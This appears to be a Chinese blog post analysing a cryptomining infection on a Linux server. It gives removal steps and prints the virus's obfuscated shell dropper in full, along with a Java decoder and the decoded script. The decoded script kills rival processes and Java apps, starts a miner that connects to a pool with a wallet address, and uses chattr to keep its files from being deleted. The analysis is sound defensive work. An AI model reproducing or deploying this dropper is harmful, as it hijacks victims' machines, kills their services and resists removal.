症状:

cpu 飙高,如果有java 程序的话会发现程序每隔30分钟重新启动一次

用top命令查看 发现  /tmp/. 这个程序非常消耗cpu

病毒源码

病毒定时任务

清除过程:

1. 先停止定时任务  service crond stop，并杀死正在运行的进程 kill -9  66953

2. 删除运行脚本

cd /tmp

-- 删除运行脚本

lsattr .ssh          #查看文件添加了a属性
chattr -aie .ssh3   #减去a属性就可以删除了

rm -rf .ssh3

3.  删除二进制病毒文件

这个文件比较特殊  一个 . 后边有6个空格，很难发现

lsattr ".      "
chattr  -aie  ".      "

rm -f  ".      "

 

4. 删除定时任务

lsattr /var/spool/cron/root

chattr -ai /var/spool/cron/root

vi   /var/spool/cron/root   删除一下的定时任务

 

破解病毒文件

1. 病毒源码 .ssh3，这是混淆过的shell 脚本

z="
";HBz='a7';XCz='a ';TBz='S1';hBz='Mu';ECz='p ';Bz='il';MCz='=3';bBz='ZR';Jz='ux';PBz='Me';sBz='F.';QBz='Hk';TCz=' +';Dz='" ';WCz='3';Uz='ja';CBz='5Z';LBz='WJ';tBz='22';YCz='."';Nz='ba';pBz='HJ';VCz='.s';iBz='tE';SCz='tr';Lz='r6';FCz='x ';Rz='ft';mBz='Tj';fBz='Fp';XBz='Lq';ICz='na';pz='s';yz='2t';Mz='4';Hz='-l';KCz='ev';uz=' -';JCz='te';Qz='so';xz='z5';wz='45';UBz='82';kz='rn';xBz=' 0';rz='mp';tz=' "';RBz='Lc';BBz='wt';Kz='xs';KBz='hk';nz='ns';vBz='0 ';VBz='U4';MBz='JX';lz='xo';nBz='A1';Yz='on';Xz='th';HCz='do';sz='/.';bz='dh';az='2';hz='ss';Vz='va';ZBz='aD';Pz='64';Zz='x3';LCz='el';qz='/t';Sz='xm';lBz='wr';dBz='DA';GBz='8N';oz='yh';JBz='Ri';Fz='"';rBz='E5';aBz='ey';OBz='ta';wBz='-o';NBz='VP';Tz='32';Iz='in';jBz='VE';dz='d';cBz='7n';Wz='py';ez='x6';vz='u ';SBz='KM';ACz='b9';qBz='m7';mz='rg';Oz='sh';NCz='B ';DBz='aQ';Cz='l ';UCz='i ';fz='ri';IBz='8a';cz='pc';iz='hd';yBz='34';CCz='d:';RCz='at';ABz='Wb';WBz='vv';oBz='hw';OCz='-t';PCz=' 3';DCz='77';jz='ma';GCz='--';Az='pk';gBz='2W';EBz='r4';YBz='yZ';BCz='29';FBz='yQ';eBz='E3';gz='g';QCz='ch';uBz='50';Gz='ld';kBz='9X';Ez='  ';
eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Az$Bz$Cz$Gz$Hz$Iz$Jz$z$Az$Bz$Cz$Kz$z$Az$Bz$Cz$Lz$Mz$z$Az$Bz$Cz$Nz$Oz$Pz$z$Az$Bz$Cz$Qz$Rz$z$Az$Bz$Cz$Sz$Tz$z$Az$Bz$Cz$Uz$Vz$z$Az$Bz$Cz$Wz$Xz$Yz$z$Az$Bz$Cz$Zz$az$z$Az$Bz$Cz$bz$cz$dz$z$Az$Bz$Cz$ez$Mz$z$Az$Bz$Cz$Sz$fz$gz$z$Az$Bz$Cz$hz$iz$Pz$z$Az$Bz$Cz$ez$Mz$z$Az$Bz$Cz$jz$kz$z$Az$Bz$Cz$lz$mz$gz$z$Az$Bz$Cz$nz$oz$pz$z$qz$rz$sz$Dz$Ez$Ez$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$jBz$kBz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$wBz$xBz$Zz$yBz$ACz$BCz$CCz$DCz$DCz$uz$ECz$FCz$GCz$HCz$ICz$JCz$Hz$KCz$LCz$MCz$uz$NCz$OCz$PCz$az$z$QCz$RCz$SCz$TCz$UCz$VCz$Oz$WCz$z$QCz$RCz$SCz$TCz$XCz$VCz$Oz$WCz$z$QCz$RCz$SCz$TCz$UCz$YCz$Ez$Ez$Ez$Fz$z$QCz$RCz$SCz$TCz$XCz$YCz$Ez$Ez$Ez$Fz"

花了几分钟写了一个java程序翻译代码

public static void main(String[] args) {String a="z=\r\n;HBz='a7';XCz='a ';TBz='S1';hBz='Mu';ECz='p ';Bz='il';MCz='=3';bBz='ZR';Jz='ux';PBz='Me';sBz='F.';QBz='Hk';TCz=' +';Dz='\" ';WCz='3';Uz='ja';CBz='5Z';LBz='WJ';tBz='22';YCz='.\"';Nz='ba';pBz='HJ';VCz='.s';iBz='tE';SCz='tr';Lz='r6';FCz='x ';Rz='ft';mBz='Tj';fBz='Fp';XBz='Lq';ICz='na';pz='s';yz='2t';Mz='4';Hz='-l';KCz='ev';uz=' -';JCz='te';Qz='so';xz='z5';wz='45';UBz='82';kz='rn';xBz=' 0';rz='mp';tz=' \"';RBz='Lc';BBz='wt';Kz='xs';KBz='hk';nz='ns';vBz='0 ';VBz='U4';MBz='JX';lz='xo';nBz='A1';Yz='on';Xz='th';HCz='do';sz='/.';bz='dh';az='2';hz='ss';Vz='va';ZBz='aD';Pz='64';Zz='x3';LCz='el';qz='/t';Sz='xm';lBz='wr';dBz='DA';GBz='8N';oz='yh';JBz='Ri';Fz='\"';rBz='E5';aBz='ey';OBz='ta';wBz='-o';NBz='VP';Tz='32';Iz='in';jBz='VE';dz='d';cBz='7n';Wz='py';ez='x6';vz='u ';SBz='KM';ACz='b9';qBz='m7';mz='rg';Oz='sh';NCz='B ';DBz='aQ';Cz='l ';UCz='i ';fz='ri';IBz='8a';cz='pc';iz='hd';yBz='34';CCz='d:';RCz='at';ABz='Wb';WBz='vv';oBz='hw';OCz='-t';PCz=' 3';DCz='77';jz='ma';GCz='--';Az='pk';gBz='2W';EBz='r4';YBz='yZ';BCz='29';FBz='yQ';eBz='E3';gz='g';QCz='ch';uBz='50';Gz='ld';kBz='9X';Ez='  ';";Map<String,String> map=new HashMap<>(); String [] aa =a.split(";");for(String o:aa) {// System.out.println(o);String[] m= o.split("=");//System.out.println("$"+m[0]+":"+m[1].replaceAll("'",""));map.put("$"+m[0], m[1].replaceAll("'",""));}String b= "$Az$Bz$Cz$Dz$Ez$Fz$z$Az$Bz$Cz$Gz$Hz$Iz$Jz$z$Az$Bz$Cz$Kz$z$Az$Bz$Cz$Lz$Mz$z$Az$Bz$Cz$Nz$Oz$Pz$z$Az$Bz$Cz$Qz$Rz$z$Az$Bz$Cz$Sz$Tz$z$Az$Bz$Cz$Uz$Vz$z$Az$Bz$Cz$Wz$Xz$Yz$z$Az$Bz$Cz$Zz$az$z$Az$Bz$Cz$bz$cz$dz$z$Az$Bz$Cz$ez$Mz$z$Az$Bz$Cz$Sz$fz$gz$z$Az$Bz$Cz$hz$iz$Pz$z$Az$Bz$Cz$ez$Mz$z$Az$Bz$Cz$jz$kz$z$Az$Bz$Cz$lz$mz$gz$z$Az$Bz$Cz$nz$oz$pz$z$qz$rz$sz$Dz$Ez$Ez$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$jBz$kBz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$wBz$xBz$Zz$yBz$ACz$BCz$CCz$DCz$DCz$uz$ECz$FCz$GCz$HCz$ICz$JCz$Hz$KCz$LCz$MCz$uz$NCz$OCz$PCz$az$z$QCz$RCz$SCz$TCz$UCz$VCz$Oz$WCz$z$QCz$RCz$SCz$TCz$XCz$VCz$Oz$WCz$z$QCz$RCz$SCz$TCz$UCz$YCz$Ez$Ez$Ez$Fz$z$QCz$RCz$SCz$TCz$XCz$YCz$Ez$Ez$Ez$Fz";String b1="";for(Map.Entry<String, String> e:map.entrySet()) {//注意此处"\\"+e.getKey() 是关键，因为替换的字符中有$这是正则的关键字b=b.replaceAll("\\"+e.getKey(), e.getValue());  }System.out.println(b);}

 

翻译后的结果，可以看出为什么java应用会被杀死

pkill "   "
pkill ld-linux
pkill xs
pkill r64
pkill bash64
pkill soft
pkill xm32
pkill java     -- 这里会杀死所有的java 应用
pkill python
pkill x32
pkill dhpcd
pkill x64
pkill xmrig
pkill sshd64
pkill x64
pkill marn
pkill xorgg
pkill nsyhs
/tmp/."      " -u 45z52tWbwt5ZaQr4yQ8Na78aRihkWJJXVPtaMeHkLcKMS182U4vvLqyZaDeyZR7nDAE3Fp2WMutEVE9XwrTjA1hwHJm7E5F.22500 -o 0x334b929d:7777 -p x --donate-level -B -t 32
chattr +i .ssh3
chattr +a .ssh3
chattr +i ."      "
chattr +a ."      "